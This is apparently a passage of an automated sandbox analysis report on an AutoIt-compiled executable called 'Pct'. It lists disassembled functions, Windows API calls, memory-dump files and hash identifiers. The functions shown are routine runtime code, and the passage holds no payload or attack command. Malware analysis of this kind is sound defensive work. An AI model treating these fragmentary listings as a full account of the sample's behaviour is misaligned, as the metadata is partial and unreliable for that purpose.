                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                  • Opcode ID: e146686973a0849a8439e95ed5e0c77c8551e406e86c48c79e1744585afb8d97
                                                                                                                                                  • Instruction ID: 0c13f38a1d18c20875a87714829e9e9d05c812bb86898ef8315f77b74d973d80
                                                                                                                                                  • Opcode Fuzzy Hash: e146686973a0849a8439e95ed5e0c77c8551e406e86c48c79e1744585afb8d97
                                                                                                                                                  • Instruction Fuzzy Hash: 92F03A74544290BEEA3117236C48F2B6E7DD7CBF50F21022AB900A21B0D6655880DBB8
                                                                                                                                                  Function 00C29B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1009 c29b16-c29b9b call bd4a8c call c29cf1 1014 c29ba5-c29c31 call bd4ab2 * 4 call bd4a8c call be593c * 2 call bd4ab2 1009->1014 1015 c29b9d 1009->1015 1033 c29c36-c29c5c call c296c4 call c28f0e 1014->1033 1016 c29b9f-c29ba0 1015->1016 1018 c29ce8-c29cee 1016->1018 1038 c29c73-c29c77 1033->1038 1039 c29c5e-c29c6e call be2f85 * 2 1033->1039 1041 c29cd8-c29cde call be2f85 1038->1041 1042 c29c79-c29cd6 call c290c1 call be2f85 1038->1042 1039->1016 1051 c29ce0-c29ce6 1041->1051 1042->1051 1051->1018
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD4A8C: _fseek.LIBCMT ref: 00BD4AA4
                                                                                                                                                    • Part of subcall function 00C29CF1: _wcscmp.LIBCMT ref: 00C29DE1
                                                                                                                                                    • Part of subcall function 00C29CF1: _wcscmp.LIBCMT ref: 00C29DF4
                                                                                                                                                  • _free.LIBCMT ref: 00C29C5F
                                                                                                                                                  • _free.LIBCMT ref: 00C29C66
                                                                                                                                                  • _free.LIBCMT ref: 00C29CD1
                                                                                                                                                    • Part of subcall function 00BE2F85: HeapFree.KERNEL32(00000000,00000000,?,00BE9C54,00000000,00BE8D5D,00BE59C3), ref: 00BE2F99
                                                                                                                                                    • Part of subcall function 00BE2F85: GetLastError.KERNEL32(00000000,?,00BE9C54,00000000,00BE8D5D,00BE59C3), ref: 00BE2FAB
                                                                                                                                                  • _free.LIBCMT ref: 00C29CD9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                  • API String ID: 1552873950-2806939583
                                                                                                                                                  • Opcode ID: f367a7d822ecad763d06c0e58b12f8474c3781720a5e5c6e98713650862dd02a
                                                                                                                                                  • Instruction ID: 525f9a5e587b0457285894acd569d0204d2af8a57da5f5cec1de6b99e7422875
                                                                                                                                                  • Opcode Fuzzy Hash: f367a7d822ecad763d06c0e58b12f8474c3781720a5e5c6e98713650862dd02a
                                                                                                                                                  • Instruction Fuzzy Hash: FE514CB1904269AFDF24DF65DC45AAEBBB9FF48304F1000AEB659A3341DB715A808F58
                                                                                                                                                  Function 00BE563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1053 be563d-be5656 1054 be5658-be565d 1053->1054 1055 be5673 1053->1055 1054->1055 1057 be565f-be5661 1054->1057 1056 be5675-be567b 1055->1056 1058 be567c-be5681 1057->1058 1059 be5663-be5668 call be8d58 1057->1059 1060 be568f-be5693 1058->1060 1061 be5683-be568d 1058->1061 1067 be566e call be8fe6 1059->1067 1064 be5695-be56a0 call be3010 1060->1064 1065 be56a3-be56a5 1060->1065 1061->1060 1063 be56b3-be56c2 1061->1063 1070 be56c9 1063->1070 1071 be56c4-be56c7 1063->1071 1064->1065 1065->1059 1069 be56a7-be56b1 1065->1069 1067->1055 1069->1059 1069->1063 1074 be56ce-be56d3 1070->1074 1071->1074 1075 be57bc-be57bf 1074->1075 1076 be56d9-be56e0 1074->1076 1075->1056 1077 be56e2-be56ea 1076->1077 1078 be5721-be5723 1076->1078 1077->1078 1079 be56ec 1077->1079 1080 be578d-be578e call bf0dd7 1078->1080 1081 be5725-be5727 1078->1081 1082 be57ea 1079->1082 1083 be56f2-be56f4 1079->1083 1092 be5793-be5797 1080->1092 1085 be574b-be5756 1081->1085 1086 be5729-be5731 1081->1086 1091 be57ee-be57f7 1082->1091 1089 be56fb-be5700 1083->1089 1090 be56f6-be56f8 1083->1090 1087 be575a-be575d 1085->1087 1088 be5758 1085->1088 1093 be5733-be573f 1086->1093 1094 be5741-be5745 1086->1094 1095 be575f-be576b call be4906 call bf108b 1087->1095 1096 be57c4-be57c8 1087->1096 1088->1087 1089->1096 1097 be5706-be571f call bf0ef8 1089->1097 1090->1089 1091->1056 1092->1091 1098 be5799-be579e 1092->1098 1099 be5747-be5749 1093->1099 1094->1099 1114 be5770-be5775 1095->1114 1100 be57da-be57e5 call be8d58 1096->1100 1101 be57ca-be57d7 call be3010 1096->1101 1113 be5782-be578b 1097->1113 1098->1096 1104 be57a0-be57b1 1098->1104 1099->1087 1100->1067 1101->1100 1109 be57b4-be57b6 1104->1109 1109->1075 1109->1076 1113->1109 1115 be57fc-be5800 1114->1115 1116 be577b-be577e 1114->1116 1115->1091 1116->1082 1117 be5780 1116->1117 1117->1113
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1559183368-0
                                                                                                                                                  • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                                  • Instruction ID: 097a43f3dc6e0c32c570e623752f0e52a14ece10e4745ac81f68b687a9b94c04
                                                                                                                                                  • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                                                                  • Instruction Fuzzy Hash: 57519370A00B85DFDB349FAAC88466E77E5EF40328F2487A9F875962D1D7709D609B40
                                                                                                                                                  Function 00BC52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1118 bc52b0-bc52c0 1119 bfdf28-bfdf2f 1118->1119 1120 bc52c6-bc52cd 1118->1120 1123 bc530c 1119->1123 1124 bfdf35 1119->1124 1121 bfdf3a-bfdf41 1120->1121 1122 bc52d3-bc52ea PeekMessageW 1120->1122 1121->1123 1128 bfdf47 1121->1128 1126 bc52ec-bc52f4 1122->1126 1127 bc5313-bc5317 1122->1127 1125 bc530e-bc5312 1123->1125 1124->1121 1131 bfdfab-bfdfbc 1126->1131 1132 bc52fa-bc5306 1126->1132 1129 bc531d-bc5326 1127->1129 1130 bfdf95-bfdf9c 1127->1130 1133 bfdf4c-bfdf52 1128->1133 1129->1133 1134 bc532c-bc533c call bc359e 1129->1134 1130->1131 1135 bc5368-bc536d 1132->1135 1136 bc5308-bc530a 1132->1136 1137 bfdf86 1133->1137 1138 bfdf54-bfdf60 1133->1138 1144 bc533e-bc534e PeekMessageW 1134->1144 1145 bc5352-bc5366 TranslateMessage DispatchMessageW 1134->1145 1135->1125 1136->1123 1140 bc536f-bc5374 1136->1140 1137->1130 1138->1137 1141 bfdf62-bfdf66 1138->1141 1140->1125 1141->1137 1143 bfdf68-bfdf7b TranslateAcceleratorW 1141->1143 1143->1144 1146 bfdf81 1143->1146 1144->1126 1147 bc5350 1144->1147 1145->1144 1146->1134 1147->1127
                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,00BCBCD4,?,?), ref: 00BC52E6
                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC534A
                                                                                                                                                  • TranslateMessage.USER32(?,?), ref: 00BC5356
                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00BC5360
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1795658109-0
                                                                                                                                                  • Opcode ID: 0bc80318f39b49ac718ca22395036abd0c84a0066a213222ba93f97873365a00
                                                                                                                                                  • Instruction ID: e159cc6fbcd42e4333e6760fd462775fa99dd5fc92408dc7fcab349b49c58219
                                                                                                                                                  • Opcode Fuzzy Hash: 0bc80318f39b49ac718ca22395036abd0c84a0066a213222ba93f97873365a00
                                                                                                                                                  • Instruction Fuzzy Hash: 6E31E33050874A9AEB308B649C84FBA77E8EB91344F2401EDE523971D1E6B1F8C9D729
                                                                                                                                                  Function 6CC3C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6CC3C947
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC3C969
                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6CC3C9A9
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC3C9C8
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC3C9E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3830779025.000000006CC21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3830748804.000000006CC20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830852669.000000006CCAE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3830875835.000000006CCB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_6cc20000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4191843772-0
                                                                                                                                                  • Opcode ID: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                                                  • Instruction ID: 175d23052d95f614c2c2c418b3a936838a6a88b77aec02222b74de90273699f4
                                                                                                                                                  • Opcode Fuzzy Hash: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                                                  • Instruction Fuzzy Hash: 45210731B013286BDB05AEA5FC9CBAE73B9BB4A300F51021AF907A7A40FB305C008790
                                                                                                                                                  Function 00BC1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BC1275,SwapMouseButtons,00000004,?), ref: 00BC12A8
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BC1275,SwapMouseButtons,00000004,?), ref: 00BC12C9
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,00BC1275,SwapMouseButtons,00000004,?), ref: 00BC12EB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                  • Opcode ID: b26fb0ba98a819e3504302db04b43d56ec5b58ffdbd9bf1c19237cf5656e6a34
                                                                                                                                                  • Instruction ID: 738d72235513a8a0890d0b7edb9cc25518e97bf61d9c006b5505cc83079b4d68
                                                                                                                                                  • Opcode Fuzzy Hash: b26fb0ba98a819e3504302db04b43d56ec5b58ffdbd9bf1c19237cf5656e6a34
                                                                                                                                                  • Instruction Fuzzy Hash: BA111879510218BFDB208FA8DC84FAEBBECEF46745F108999E805EB211D6719E4097A4
                                                                                                                                                  Function 00BD4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BD4B44,?,00BD49D4,?,?,00BD27AF,?,00000001), ref: 00BD4B85
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BD27AF,?,00000001), ref: 00BD4B97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                                  • Opcode ID: f805ac18ce40d42d151d1df953c1ec8693af7d924d812637717efd304618a47c
                                                                                                                                                  • Instruction ID: 03711cda896a86f5bf3c5063a1ee75a7f5e14a6ed78a7c57a87889df087dbc8e
                                                                                                                                                  • Opcode Fuzzy Hash: f805ac18ce40d42d151d1df953c1ec8693af7d924d812637717efd304618a47c
                                                                                                                                                  • Instruction Fuzzy Hash: D0D0E279510B128FD7209F71D91AB0AB6E4AF14352F21886AD8C6E2650E7B0E8C48A59
                                                                                                                                                  Function 00BD5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00BD5B58
                                                                                                                                                    • Part of subcall function 00BD56F8: _memset.LIBCMT ref: 00BD5787
                                                                                                                                                    • Part of subcall function 00BD56F8: _wcscpy.LIBCMT ref: 00BD57DB
                                                                                                                                                    • Part of subcall function 00BD56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 00BD57EB
                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00BD5BAD
                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BD5BBC
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?), ref: 00C10D7C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                                  • Opcode ID: 1ccac80d089ff866d74c4b67babd65acd6d8a0a3e634fe7ee79d4af7d8bf5ed5
                                                                                                                                                  • Instruction ID: c12fae152af6b69e1f7094ef6743c423c2590d308ff63bc7d73fa79525f6bf18
                                                                                                                                                  • Opcode Fuzzy Hash: 1ccac80d089ff866d74c4b67babd65acd6d8a0a3e634fe7ee79d4af7d8bf5ed5
                                                                                                                                                  • Instruction Fuzzy Hash: 3A2129745047849FE7729B34D895BEAFBECAF12304F1400CEE69A56281D3B46AC5DB41
                                                                                                                                                  Function 00BD278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BD27AF,?,00000001), ref: 00BD49F4
                                                                                                                                                  • _free.LIBCMT ref: 00C0FB04
                                                                                                                                                  • _free.LIBCMT ref: 00C0FB4B
                                                                                                                                                    • Part of subcall function 00BD29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BD2ADF
                                                                                                                                                  Strings
                                                                                                                                                  • Bad directive syntax error, xrefs: 00C0FB33
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                  • String ID: Bad directive syntax error
                                                                                                                                                  • API String ID: 2861923089-2118420937
                                                                                                                                                  • Opcode ID: d1d69ea840ef9c3da09411e62d29c5263d59c95b384352881b661bf83b260eec
                                                                                                                                                  • Instruction ID: 0f851684364cc7984033d8d4c520e1006f0e711cf83b0ff49cff43338a5df18b
                                                                                                                                                  • Opcode Fuzzy Hash: d1d69ea840ef9c3da09411e62d29c5263d59c95b384352881b661bf83b260eec
                                                                                                                                                  • Instruction Fuzzy Hash: D8919E71900219AFCF14EFA5C8919EDB7B4FF05310F14456EF815AB691EB309E86DB90
                                                                                                                                                  Function 00C29CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD4AB2: __fread_nolock.LIBCMT ref: 00BD4AD0
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C29DE1
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C29DF4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                                  • String ID: FILE
                                                                                                                                                  • API String ID: 4029003684-3121273764
                                                                                                                                                  • Opcode ID: ed2bcedd453f5031f34ee32d591403f8acfb238d30aa5c620d82759353b0deff
                                                                                                                                                  • Instruction ID: 84056644f7fa61a7edafeca936cf8a72da277015b53139683930551553033c5e
                                                                                                                                                  • Opcode Fuzzy Hash: ed2bcedd453f5031f34ee32d591403f8acfb238d30aa5c620d82759353b0deff
                                                                                                                                                  • Instruction Fuzzy Hash: AB41F871A40219BBDF20DAA4DC45FEFB7FDDF45710F01446AFA14A7280EB719A048B64
                                                                                                                                                  Function 00BD31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C1032B
                                                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00C10375
                                                                                                                                                    • Part of subcall function 00BE0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD2A58,?,00008000), ref: 00BE02A4
                                                                                                                                                    • Part of subcall function 00BE09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00BD31F7), ref: 00BE09E4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 3777226403-3081909835
                                                                                                                                                  • Opcode ID: ae5256f22165f4a73146881b1621619b3a443b1e6ad3280bb7b19ef977f71610
                                                                                                                                                  • Instruction ID: 25cb31ccae81a021ab0bedd8a88fe4b5daebb758cf961ec0a34f5c8fc06230ba
                                                                                                                                                  • Opcode Fuzzy Hash: ae5256f22165f4a73146881b1621619b3a443b1e6ad3280bb7b19ef977f71610
                                                                                                                                                  • Instruction Fuzzy Hash: BC2199719142989BCF41DF94C8457EEBBF89F49701F104096E414B7341DBF55A88DFA1
                                                                                                                                                  Function 00C3D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
